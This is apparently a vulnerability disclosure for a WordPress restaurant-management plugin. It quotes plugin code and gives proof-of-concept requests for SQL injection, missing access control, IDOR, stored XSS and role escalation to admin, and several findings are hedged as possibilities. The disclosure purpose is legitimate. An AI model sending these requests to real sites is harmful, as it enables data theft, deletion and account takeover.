@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > WordPress Easy Restaurant Manager Plugin - Multiple Vulnerabilities .:. Date: April 19, 2025 .:. Exploit Author: bRpsd .:. Contact: cy[at]live.no .:. Vendor -> https://wordpress.org/plugins/easy-restaurant-manager/ .:. Tested Version -> 1.0 .:. DBMS -> MySQL .:. Tested on > macOS [*nix Darwin Kernel], on local xampp @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ [+] Vulnerability #1: SQL Injection Vulnerable Code: ========================================================================================== public static function store($coupon) { return Coupon::store($coupon); } public static function updateCoupon($coupon){ return Coupon::updateCoupon($coupon); } public static function deleteCoupon($id){ return Coupon::deleteCoupon($id); } $data = $request->get_param('data'); $id = $data['id']; ========================================================================================== Issue: These methods in CouponResource.php demonstrate how user-controlled input ($coupon, $id) is directly passed to model methods without any visible validation or sanitization. Similar patterns exist across multiple resource classes including ReservationResource, MenuResource, ColorResource, and TableResource. An attacker could exploit this by sending a malicious request to an endpoint that utilizes these methods: POC1: POST /wp-json/easy-restaurant-manager/v1/coupons Content-Type: application/json { "name": "Discount", "code": "' OR 1=1; -- ", "discount_type": "percentage", "discount_value": "10", "added_date": "2025-04-19", "expiration_date": "2025-05-19", "status": "active" } POC2: POST /wp-json/easy-restaurant-manage/v1/coupon Content-Type: application/json { "data": { "id": "1 OR 1=1" } } [+] Vulnerability #2: Missing Access Control in Resource Methods Vulnerable code: ========================================================================================== public static function getReservation(){ return Reservation::getReservation(); } public static function UpdateReservation($id, $status){ return Reservation::UpdateReservation($id, $status); } public static function deleteReservation($id){ return Reservation::deleteReservation($id); } ================================================================================================================ Issue: The resource classes show no evidence of authentication or authorization checks before performing sensitive operations on data.These methods in ReservationResource.php handle sensitive operations without visible permission checks. This could allow unauthorized users to access, modify, or delete data if the API endpoints don't implement proper access controls. POC: An attacker could attempt to access or modify reservations belonging to other users by manipulating request parameters: DELETE /wp-json/easy-restaurant-manager/v1/reservations/123 Without proper authorization checks, this could delete any reservation in the system, regardless of whether it belongs to the current user [+] Vulnerability #3: Insecure Direct Object References (IDOR) Vulnerable code: ================================================================================================================ public static function deleteMenu($id){ return Menu::deleteMenu($id); } ================================================================================================================ Issue: This method in MenuResource.php potentially allows access to any menu item by its ID. Without proper access controls, an attacker could simply increment or modify ID values to access or modify resources belonging to other users or branches.By manipulating ID parameters in requests, an attacker could access unauthorized resources: POC: GET /wp-json/easy-restaurant-manager/v1/tables/5 GET /wp-json/easy-restaurant-manager/v1/tables/6 GET /wp-json/easy-restaurant-manager/v1/tables/7 [+] Vulnerability #4: Stored XSS Vulnerable code: ================================================================================================================ public static function getTemplateSettings() { return get_option('easy_restaurant_manger_menus_template_settings', [ 'primary_color' => '#3498F5', 'secondary_color' => '#6B3CEB', 'background_color' => '#fff', 'font_color' => '#253241', 'template' => 'classic', 'menu_single_page' => 'yes', 'category_title' => 'OUR SPECIAL MENU', 'category_short_desc' => 'Enjoy the unique dishes from the best/elite restaurant that only our restaurant has. Fusce malesuada, lorem vitae euismod lobortis.', 'menus_title' => 'Menus', 'menus_short_desc' => 'Enjoy the unique dishes from the best/elite restaurant that only our restaurant has. Fusce malesuada, lorem vitae euismod lobortis.', ]); } ================================================================================================================ Issue: The ColorResource class handles template settings that are used in the frontend that can be adjusted by the user to cause stored XSS.The input is stored and later rendered without proper escaping. An attacker could update color settings or descriptions with malicious JavaScript: POC: POST /wp-json/easy-restaurant-manager/v1/settings Content-Type: application/json { "category_short_desc": "" } [+] Vulnerability #5: Custom User Management Vulnerabilities Code: ========================================================================================== $sql = "CREATE TABLE IF NOT EXISTS `{$wpdb->prefix}erm_users` ( id INT PRIMARY KEY AUTO_INCREMENT, branch_id INT DEFAULT NULL, name VARCHAR(255) NOT NULL, email VARCHAR(255) UNIQUE NOT NULL, phone VARCHAR(20) NOT NULL, password VARCHAR(255) NOT NULL, role ENUM('customer', 'admin', 'manager') NOT NULL DEFAULT 'customer', loyalty_points INT DEFAULT 0, created_at DATETIME DEFAULT CURRENT_TIMESTAMP, updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP ) $charset_collate;"; ========================================================================================== Issue: The plugin implements its own user management system rather than leveraging WordPress's built-in capabilities. This custom implementation stores passwords and handles user roles separately from WordPress. Without seeing the implementation details, this raises concerns about Password storage security (hashing algorithms, salting),Session management security,Privilege escalation possibilities between custom roles If the plugin does not properly validate role changes, an attacker might exploit this to gain elevated privileges like this: PUT /wp-json/easy-restaurant-manager/v1/users/profile Content-Type: application/json { "role": "admin" } 2025-04-01: Initial discovery 2025-04-08: Vendor notification 2025-04-12: Follow-up (no response) 2025-04-19: Coordinated disclosure